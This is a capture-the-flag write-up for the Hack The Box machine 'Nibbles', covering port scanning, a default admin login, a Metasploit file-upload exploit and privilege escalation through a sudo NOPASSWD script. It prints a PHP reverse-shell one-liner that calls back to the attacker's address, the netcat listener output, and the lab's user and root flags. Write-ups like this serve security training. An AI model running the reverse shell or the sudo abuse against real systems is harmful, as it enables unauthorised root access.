Nibbles – Hackthebox

Skills Required
Basic knowledge of Linux
Enumerating ports and services

Skills Learned
Very Basic scripting
Web enumeration
Exploiting NOPASSWD

START

Nmap scan revealed 2 open ports 22 and 80

[root:~]# nmap -p- -f 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-16 12:10 BST
Nmap scan report for 10.10.10.75
Host is up, received echo-reply ttl 63 (0.032s latency).
Not shown: 65311 closed ports, 222 filtered ports
Reason: 65311 resets and 222 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Browsing to the webpage gave me this and viewing the source directed me to a blog type website.

I ran a dirbuster on 10.10.10.75/nibblesblog and found an admin area. I googled the default creds for nibblesblog and tried them. It worked

I looked to see if there were any exploits for nibble and seen there was a Metasploit module.

[root:~/Desktop/nibbles]# searchsploit nibble
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
Nibbleblog - Multiple SQL Injections | exploits/php/webapps/35865.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
[root:~/Desktop/nibbles]# cat /usr/share/exploitdb/exploits/php/webapps/35865.txt
source: http://www.securityfocus.com/bid/48339/info

Nibbleblog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Nibbleblog 3.0 is affected; other versions may also be vulnerable.

http://www.example.com/index.php?page=[SQLi]
http://www.example.com/post.php?idpost=[SQLi]# [root:~/Desktop/nibbles]#

I cranked up Metasploit and ran the exploit with the following details and got a Metreperter shell:

I navigated to the home directory and into nibbler’s home directory to get the user.

meterpreter > cat user.txt
b02ff32bb332deba49eeaed21152c8d8

Its always good to see what su access you have. What i’ve found in HTB is that it generally gives away what you have to modify and run to get root. Sure enough:

meterpreter > shell
Process 22018 created.
Channel 1 created.
sudo -l
sudoMatching Defaults entries for nibbler on Nibbles:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
 (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
: unable to resolve host Nibbles: Connection timed out

So I can run monitor.sh as root which will allow me to get a reverse root shell. I unzipped the personal zip folder and added this to the bottom of monitor.sh

sudo php -r '$sock=fsockopen("10.10.14.234",44444);exec("/bin/sh -i <&3 >&3 2>&3");'

I started a netcat listener on the 44444 port. After about 20 seconds I got a connection back.

[root:...ktop/nibbles/personal/stuff]# nc -lvp 44444
listening on [any] 44444 ...
10.10.10.75: inverse host lookup failed: Unknown host
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.75] 50308
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
b6d745c0dfb6457c55591efc898ef88c
#

FIN

Conclusion

This was quite and easy box for me. Not long ago I had finished Bashed and remembered to take advantage of the sudo -l. I want to go back and redo this box before it retires and complete it without using metasploit.